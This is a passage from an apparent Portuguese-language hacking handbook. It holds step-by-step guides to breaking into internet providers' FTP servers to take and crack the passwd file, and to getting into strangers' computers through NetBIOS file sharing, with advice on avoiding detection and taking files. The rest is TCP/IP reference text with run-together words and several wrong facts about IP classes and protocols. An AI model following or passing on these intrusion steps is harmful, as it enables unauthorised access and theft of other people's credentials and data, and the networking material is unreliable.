  25. 25. RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE SABER, EM POUCOS SEGUNDOS, OQUE ESTÁ RODANDO EM SUA MÁQUINA.IMPRESSÃO DIGITALATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE PACOTES IP A UM SITE ESPECÍFICO,PODE-SE DETECTAR QUE SISTEMA OPERACIONAL ESTÁ RODANDO ANALIZANDO OSPACOTES QUE ELE ENVIA DE VOLTA. COM POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUEFERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU VANDALIZAR O SEU MICRO. E É NESTEPONTO QUE VOCÊ DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A ALMA DONEGÓCIO. A INVASÃO DE SISTEMAS É BASICAMENTE UMA TAREFA DE PESQUISA E COLETADE DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ ESTIVER, MENOS CHANCESTERÁ DE RECEBER UM ATAQUE NO FUTURO.INVADINDO FTP´SATAQUE POR FTP (ML HACKING)INGREDIENTES:COMPUTADOR LIGADO À INTERNETPROGRAMA FTP.EXEUM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O PROGRAMA NÃO RODADIREITO.E UM PROVEDOR DE INTERNET PEQUENO A GOSTO.MODO DE PREPARO:LIGUE O COMPUTADOR.CONECTE-SE À INTERNET.CLIQUE EM INICIAR OU START, DEPENEENDO DO RUINDOWS.CLIQUE EM EXECUTAR. 25
  26. 26. DIGITE FTP E CLIQUE EM OK.DEPOIS O PROGRAMA COMEÇARÁ.AÍ VOCÊ VERÁ "FTP>"DAÍ DIGITE OPEN www.provedor .COM.BRNO LOGIN DIGITE: "ANONYMOUS"NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O SEU E TEM QUE SER UM QUE NÃOCHAME MUITO A ATENÇÃO.VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E AGORA? O QUE FAZER? EU IREI LEVÁ-LO AO ARQUIVO QUE CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O QUE QUISEREM OUTRO PROVEDOR.DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E DIRETÓRIOS DO PROVEDOR.SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA MUDAR O DIRETÓRIO, SE NÃO TIVERDIGITE CLOSE.DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE GET PASSWD, SE NÃO DIGITECLOSE.PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA JACK QUE TIRA AS SENHAS DOARQUIVO.COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA DE DADOS, QUE EU ESQUECI ONOME COLOQUE A SUA WORDLIST.SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O DO MS-DOS. VÁ AO PROMPT EDIGITE FTP. IRÁ APARECER O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO PROMPT. DITEENTÃO O ENDEREÇO DO HOST PU O SEU IP.AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD, TENTE USAR OS PASSWORDS DO UNIX,SE NÃO DER VOCÊ PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL?NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE NOVAMENTE. DEPOIS DIGITE"QUOTE USER FTP", DÊ UM ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER 26
  27. 27. NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ ESTÁ HACKEANDO...NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S, QUE É LOGIN ANONYMOUSPASSWORD E-MAIL, POIS SERÁ APLICADO O MODO DE PROTEÇÃO...MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO?AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN, TIPO HOMEROOT. DAÍ, PARA VER ALISTA DE USERS VOCÊ VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM USUÁRIO. NÃOTENTEM PEGAR AS SENHAS POIS ESTÃO CRIPTOGRAFADAS, POIS A MAIORIA DOS USERSUSA A MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS COMANDOS DE FTP, DIGITE ? ETECLE ENTER. DAÍ, É SÓ HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UMPROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É CADEIA!!!!!!.FTP DO DOSCOMANDOSFUNÇÕESAPPENDACRESCENTAR UM ARQUIVOASCIIDEFINIR UM TIPO DE TRANFERÊNCIA ASCIIBELLEMITIR UM AVISO SONORO AO TÉRMINO DO COMANDOBINARYDEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA 27
  28. 28. BYETERMINAR SEÇÃO DE FTP E SAIRCDALTERAR A PASTA DE TRABALHO REMOTACLOSETERMINAR SESSÃO DE FTPDELETEEXCLUIR PASTAS DE TRABALHO REMOTADEBUGLIGAR/DESLIGAR MODO DE DEPURAÇÃODIRLISTAR CONTEÚDO DA PASTA REMOTADISCONNECTTERMINAR SESSÃO DE FTPGETRECEBER ARQUIVOGLOB 28
  29. 29. LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAISHASHLIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDOHELPAJUDA DO FTPLCDALTERAR A PASTA DE TRABALHO LOCALLITERALENVIAR UM COMANDO DE FTP ARBITÁRIOLSLISTAR O CONTEÚDO DA PASTA REMOTAMDELETEEXCLUI VÁRIOS ARQUIVOSMDIRLISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTASM GETOBTER VÁRIOS ARQUIVOS 29
  30. 30. MKDIRCRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTAMLSLISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTASMPUTENVIAR VÁRIOS ARQUIVOSOPENCONECTAR AO FTP REMOTOPROMPTFORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOSPUTENVIAR UM ARQUIVOPWDIMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTAQUITTERMINAR A SESSÃO DE FTP E SAIRQUOTENVIAR UM COMANDO ARBITRÁRIO 30
  31. 31. RECVRECEBER ARQUIVOREMOTEHELPOBTER AJUDA A PARTIR DO SERVIDOR REMOTORENAMERENOMEAR ARQUIVORMDIRREMOVER PASTA DA MÁQUINA REMOTASENDENVIAR ARQUIVOSTATUSMOSTRAR STATUS ATUALTRACELIGAR/DESLIGAR RASTREAMENTO DE PACOTESTYPEDEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOSUSER 31
  32. 32. ENVIAR INFORMAÇÕES DE NOVO USUÁRIOVERBOSEInvasão por IPPassa-a-passo: 1º- Certifique-se de que você possui este programa nbstat:2º- Vá ao Prompt do MS-DOS.3º- Digite: nbtstat -a o IP do cara que você quer invadir4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se nãoaparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caraspor causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas quetem no PC compartilhamento de arquivos as pastas)5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar onome do negócio que estiver com <03> atrás do nome.6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . ONetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eudigitei)7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"9º- Pronto! Você invadiu por IP! 32
  33. 33. 10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas dolammaH e se achar algo interessante pega para você. OBS: Tem algumas pessoas querenomeiam o arquivo vnbt.386 no windowssystem para que se alguem tente te nukar ouinvadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da parainvadir.PROTOCOLOS DE REDETCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS USADOS NA INTERNET. ELE INCLUI UMASÉRIE DE PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES VÃO SE COMUNICAR ECRIA CONVENÇÕES PARA INTERCONECTAR REDES PARA O ROUTEAMENTO ATRAVÉS DESSASCONEXÕES.OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO DO PROJETO DA DARPA, SOBRECONECTIVIDADE ENTRE REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM TODAS ASREDES DE LONGA DOSTÂNCIA DO SISTEMA DE DEFESA DOS EUA EM 1983, MAS NÃO FOIRAPIDAMENTE ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2.A POPULARIDADE DO TCP/IP É BASEADO EM:ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É UMA ÓTIMA PLATAFORMA CLIENTESERVIDOR, ESPECIALMENTE EM AMBIENTES WAN.COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE INFORMAÇÕES MILITARES,EDUCACIONAIS, CIENTÍFICAS, E COMERCIAIS COMPARTILHAM DADOS, CORREIOELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO O TCP/IP. AMPLADISPONIBILIDADE. IMPLEMENTAÇÕES DO TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTETODOS OS SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É AMPLAMENTE DISPONÍVELEM VÁRIAS IMPLEMENTAÇÕES. FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES DEREDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS PRODUTOS.CONCEITOSEXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS EM RELAÇÃO AO TCP/IP E DE 33
  34. 34. REDES QUE O UTILIZAM.NÚMEROEXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E TELEFONES E O NÚMERO DE IP ÉUMA DELAS. VOCÊ PODE IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE TELEFONECOM TODOS OS CÓDIGOS DE DISCAGEM INTERNACIONAL. ISTO SE SIGNIFICA QUEQUALQUER MÁQUINA PODE SE CONECTAR A OUTRO USANDO O NÚMERO DE IP, BASTADOQUE EXISTA APENAS UM CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA NAREDE TEM DE TER UM NÚMERO DE IP.ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA REDE NÃO PODEM TER OMESMO NÉMERO DE IP. ESTA RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA REDE,POIS MÁQUINAS NUMA REDE NÃO CONECTADA USUALMENTE TEM NÚMERO DE IP IGUAIS,POR ALGUMAS CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM TELEFONES, IMAGINEDUAS PESSOAS MORANDO EM PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO DETELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE CASO NÃO HÁ CONFLITO.O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM FORMATO ESPECÍFICOXXX.XXX.XXX.XXX (EXEMPLO: 200.212.235.122). ISSO SIGNIFICA QUE CADA AGRUPAMENTOPODE IR DE 0 À 255 (POIS ESSA É A CAPACIDADE DE 1 BYTE)MÁSCARAEXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A, B, C. A DIFERENÇA ENTRE AS CLASSESÉ A FORMA DE COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO DE IP É DIVIDO EMDUAS PARTES: O ENDEREÇO DA REDE EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERODE IP DA SEGUINTE FORMA: W.X.Y.Z.CLASSEN º DE IPINDICADOR DA REDE 34
  35. 35. INDICADOR DA SUB REDENºDE REDES DISPONÍVEISNºDE SUB REDES DISPONÍVEISA1.126wx.y.z12616,777,214B128.191w.xy.z16,38465,534C192.223w.x.yz2,097,151254OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM REDES INTERNAS, O ENEREÇO 127É UTILIZADO PARA TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO RESERVADOS PARA 35
  36. 36. PROTOCOLOS ESPECIAIS.UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE ATRAVÉS DE UMA REDE PERTENCENTEÀ INTERNET. A REDE PERTENCENTE RECEBE UM NÚMERO DE IP E DITRIBUI O NÚMERO DE IPDENTRO DE SUA SUB REDE. AS CLASSES APENAS DEFINEM QUEANTAS SUB REDES UMNÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM 126 NÚMEROS DE IP DQACLASSE A E CADA UM DELES PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO PODEIMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE CLASSE A E B NA INTERNET, E QUE OS DACLASSE C ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO DESSES NÚMEROS.AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO NÚMERO DE IP. A PRIMEIRA VISTAPARECE DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO NÚMERO DO IP PARADETERMINAR A CLASSE. MAS ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODEFUNCIONAR COMO UM DA CLASSE B OU CLASSE C, DEPENDENDO DA ESTRUTURA INTERNADA SUA SUB REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200 FILIAIS NO BRASILCONECTADAS POR UMA REDE PRÓPRIA. A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A,DIGAMOS 100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE FORMA:100.1.0.0Matriz100.2.0.0Filial 1100.3.0.0Filial 2100.201.0.0Filial 200 36
  37. 37. PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE B, POIS SÓ TEM 16.384 SUBREDESDISPONÍVEIS, EMBORA COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL SEDISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS DE IP CLASSE C.PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE, OS COMPUTADORES PRECISAMSABER QUAL A CLASSE DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES:ClasseMáscara de Sub-redeA255.0.0.0B255.255.0.0C255.255.255.0GATEWAYGATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS AJUDA QUANDO NÃOCONSEGUIMOS ACHAR UMA OUTRA MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMAMÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA, ELA EMITE UM PEDIDO DECONEXÃO (ESSE PEDIDO É FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA QUEENVIA O PEDIDO A TODA A REDE, E APENAS A MÁQUINA DESTINO RESONDE), E AGUARDAUMA RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO COM O GATEWAY PADRÃO E 37
  38. 38. SOLICITA QUE O MESMO CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY CONSEGUIRCONECTAR À MÁQUINA DESTINO, ELE FICA COMO INTERMEDIADOR DESSA CONEXÃO, CASOCONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO FOI POSSÍVEL ENCONTRAR AMÁQUINA DESTINO. ESSA ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGODESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A CONEXÃO REALIZADA NA INTERNET (ETODAS AS REDES CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS COMPUTADORESLIGADAS A ELA. SERIA UM TRÁFEGO MUITO GRANDE. AO INVÉS DISSO, O BROADCAST ÉDIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA NETWORK OU REDE LOCAL) DEPOISNA WAN DE SUA CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ CHEGAR NA WANINTERNACIONAL. REDUZ-SE DESSE MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANSALIVIANDO AS LINHAS DE CONEXÃO.DNSESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A MAIORIA DAS PESSOAS, MAS ELASDIGNIFICAM DOMAIN NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO SIGNIFICAM COISAALGUMA PARA A MIORIA DAS PESSOAS, POR ISSO, VAMOS À ANALOGIA COM O TELEFONE.QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA ESQUINA, VOCÊ CONSULTA OCATÁLOGO, DESCOBRE O TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE TELEFONAR PARAALGUM LUGAR SE NÃO SOUBER O NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA.OS USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS MÁQUINAS, E SIM OS NOMES. MASPARA SE ALCANÇAR UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO DE IP. PARARESOLVER ISSO FOI CRIADO O DNS, UM SERVIÇO DISPONÍVEL NA REDE QUE, DADO UMNOME DE MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA. EXISTE UMAPARTICULARIDADE AQUI. NO CASO DA REDE LOCAL ESTAR CONECTADA A ALGUMA OUTRA,É RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA EXECUTADO NA MÁQUINA DE LIGAÇÃOENTRE AS DUAS REDES (O GATEWAY), PARA CASO DE O NOME REQUISITADO NÃO EXISTIRNA REDE LOCAL , O DNS POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA PESQUISARO TAL NOME.O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O WINS (WINDOWS INTERNET NEMESYSTEM OU SISTEMA DE NOMES DA INTERNET DO WINDOWS). A PRINCIPAL DIFERENÇAENTRE OS DOIS É QUE O DNS USA UMA TABELA ESTÁTICA, E O WINS USA UMA TABELADINÂMICA. NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO WINDOWS NT ÉRECOMENDÁVEL QUE ELE SEJA SUSTIUÍDO PELO WINS.DHCPMAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA PARA A MIORIA DOS USUÁRIOS.MAS INFELIZMENTE NÃO EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO VAMOS 38
  39. 39. DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC HOST CONFIGURATION PROTOCOL", OUSEJA: PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO. NIAM REDE TCP/IP, TODOCOMPUTADOR, TODO COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO SIGNIFICA QUEANTES DE COLOCAR UMA NOVA MÁQUINA NA REDE, O ADMINISTRADOR TERIA DEIDENTIFICAR QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA ESCOLHER UM NÚMEROADEQUADO PARA A NOVA MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER FEITO,MAS EM GRANDES REDES ISSO SE TORNA UMA TAREFA TEDIOSA E SUJEITA A FALHAS. PARAEVITAR ISSO FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA REDE, ELA PROCURAO SERVIDOR DHCP (CUJO NÚMERO DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UMNÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA QUAL O NÚMERO DISPONÍVEL,INFORMA AO SOLICITANTE ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURASSOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS NÚMEROS DE IP SÃO FEITASAUTOMATICAMENTE E NÃO EXISTEM PROBLEMAS DE CONFLITO. QUANDO A MÁQUINASOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA ESSE NÚMERO DISPONÍVELNOVAMENTE.PORTASUMA PORTA PODE SER VISTA COMO UM CANAL DE COMUNICAÇÕES PARA UMA MÁQUINA.PACOTES DE INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO APENASENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA NUMA DTERMINADA PORTA. VOCÊ PODEIMAGINAR UMA PORTA COMO SENDO UM CANAL DE RÁDIO, COM A DIFIRENÇAFUNDAMENTAL DE QUE UM COMPUTADOR PODE "OUVIR" TODOS OS 65000 CANAISPOSSÍVEIS AO MESMO TEMPO.ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ OUVINDO EM TODAS ASPORTAS, ELE ESCUTA A ALGUMAS PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UMPEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO.EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA CERTOS SERVIÇOS QUE SÃO ACEITOSUNIVERSALMENTE. AS PRINCIPAIS SÃO:SERVIÇOPORTADESCRIÇÃO 39
  40. 40. FTP21PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOSTELNET23PARA SE CONECTAR REMOTAMENTE A UM SERVIDORSMTP25PARA ENVIAR UM EMAILGOPHER70BROWSER BASEADO EM MODO TEXTOHTTP80PROTOCOLO WWW – NETSCAPE, MOSAICPOP3110PARA RECEBER EMAILNNTP119 40
  41. 41. NEWS GROUPSIRC6667INTERNET RELAY CHAT – BATE PAPO ONLINECOMPUSERV4144COMPUSERV WINCIMAOL5190AMERICA ONLINEMSN569MICROSOFT NETWORKOUTROSOUTROSOUTROSROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA CONECTAR DUAS OU MAIS REDESDISTINTAS. ELE TEM ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR) OS PACOTESDE UMA REDE PARA OUTRA, ATUANDO COMO UM GUARDA DE TRÂNSITO PARA OSPACOTES ENTRE AS REDES.GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE SERVE PARA CONECTAR DUAS 41
  42. 42. OU MAIS REDES DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É QUE O GATEWAYNÃO TEM UM HARDWARE ESPECIAL PARA O ROTEAMENTO. USUALMENTE OS GATEWAYSCONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS CASOS SE UTILIZA UM ROTEADOREM CONJUNTO COM O GATEWAY.VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA ESTRUTURA BÁSICA COMPOSTA PORUM OU MAIS SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS), DHCP, SMTP, POP3, E OSSERVIDORES DOS SERVIÇOS DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINACLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE INTERLIGAR ESSA REDE A OUTRA REDETCP/IP, SE FAZ NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA CORRETACONFIGURAÇÃO DA REDE.EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET:ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA MÁQUINA NA REDE, O QUE PODE SERIMPOSSÍVEL PARA REDES COM MUITAS MÁQUINAS.ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY E UTILIZANDO-SE O NÚMERO DEIP 192.168.X.X INTERNAMENTE.COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS OBERVÁ-LO MELHOR. NELE, SEUTILIZA INTERNAMENTE A LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO DOSNÚMEROS DE IP FOI RESERVADO PARA O USO DE REDES INTERNAS, OU SEJA, NENHUMAMÁQUINA LIGADA DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É NECESSÁRIOPOIS COMO JÁ VIMOS NENHUMA MÁQUINA PODE TER UM NÚMERO DE IP QUE JÁ ESTEJASENDO UTILIZADO POR UMA OUTRA MÁQUINA.O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA SE CONECTAR À INTERNET EOUTRA PARA SE CONECTAR À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO DEIP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO TIPO 192.168.X.X (USUALMENTE192.168.0.1). NAS MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X (ONDE OPRIMEIRO X É O MESMO DO GATEWAY) E O GATEWAY DEFALT É O IP DO GATEWAYVOLTADO PARA A LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ 16.384 MÁQUINASNA INTERNET POR NÚMERO DE IP VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃODE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA INTERNET, POIS COMO TODO OTRÁFEGO NA INTERNET PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA PROTEGER TODA 42
  43. 43. A LAN.PROTOCOLOSTCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA FAMÍLIA TCP/IP. IP É UMPROTOCOLO QUE PROVIDENCIA A ENTREGA DE PACOTES PARA TODOS OS OUTROSPROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM SISTEMA DE ENTREGA DE DADOS SEMCONEXÃO. ISTO É, OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO SEU DESTINO,NEM DE SEREM RECEBIDOS DA FORMA QUE FORAM ENVIADOS. O CHECK SUN DO IPCONFIRMA APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE. DESTA MANEIRA, ARESPONSABILIDADE PELOS DADOS CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) ÉTAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL.TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O TCP. O TCP OFERECE UMCONFIÁVEL PROTOCOLO BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP GARANTE AENTREGA DOS PACOTES, ASSEGURA O SEQUENCIAMENTO DOS PACOTES E PROVIDENCIAUM CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO OS DADOS DO PACOTE. NOCASO DA REDE PERDER OU CORROMPER UM PACOTE TCP/IP DURANTE A TRANSMISSÃO, ÉTAREFA DO TCP RETRANSMITIR O PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADETORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA TRANSMISSÕES BASEADAS EM SESSÃO,APLICATIVOS CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO CORREIO ELETRÔNICO.PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS CABEÇALHOS DOS PACOTES TCPREQUEREM USO DE BITS ADICIONAIS PARA ASSEGURAR O CORRETO SEQUENCIAMENTO DAINFORMAÇÃO, BEM COMO UM CHECK SUN OBRIGATÓRIO PARA GARANTIR A INTEGRIDADEDO CABEÇALHO E DOS DADOS. PARA GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLOTAMBÉM REQUER QUE O DESTINATÁRIO INFORME O RECEBIMENTO DO PACOTE.TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM TRÁFEGO ADICIONAL NA REDE,DIMINUINDO A TAXA DE TRANFERÊNCIA DE DADOS EM FAVOR DA CONFIABILIDADE. PARAREDUZIR O IMPACTO NA PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM ACKPARA TODOS (AO INVÉS DE TODO O PACOTE) OU QUANDO UM ACK EXPIRA.UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP (USER DATAGRAM PROTOCOL), UM 43
  44. 44. COMPLEMENTO DO TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS SEMCONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM A CORRETA SEQUENCIA DOS PACOTESENVIADOS (BEM PARECIDO COM O IP). CHECKSUNS NO UDP SÃO OPCIONAIS OFERECENDOASSIM UMA MANEIRA DE SE TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL SEMCONSUMIR DESNECESSARIAMENTE RECURSOS DA REDE.ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP TEM IMPORTANTES FUNÇÕES,EMBORA ESSAS FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS COM ATRANSMISSÃO DE DADOS: (ARP= ADDRESS RESOLUTION PROTOCOL, OU PROTOCOLO DERESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET CONTROL MESSAGE PROTOCOL, OUPROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O ICMP SÃOPROTOCOLOS DE MANUTENÇÃO QUE MANTÉM A ESTRUTURA DO IP E USUALMENTE SÃOINVISÍVEIS AOS USUÁRIOS E AS APLICAÇÕES.OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP DA ORIGEM QUANTO DO DESTINO,MAS O ENDEREÇO DO HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM UMENDEREÇO DE HARDWARE DE UM DETERMINADO SISTEMA DIFUNDINDO PELA REDE UMPACOTE ESPECIAL DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO) CONTENDO OENDEREÇO IP DO SISTEMA COM O QUAL ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DAREDE LOCAL QUE 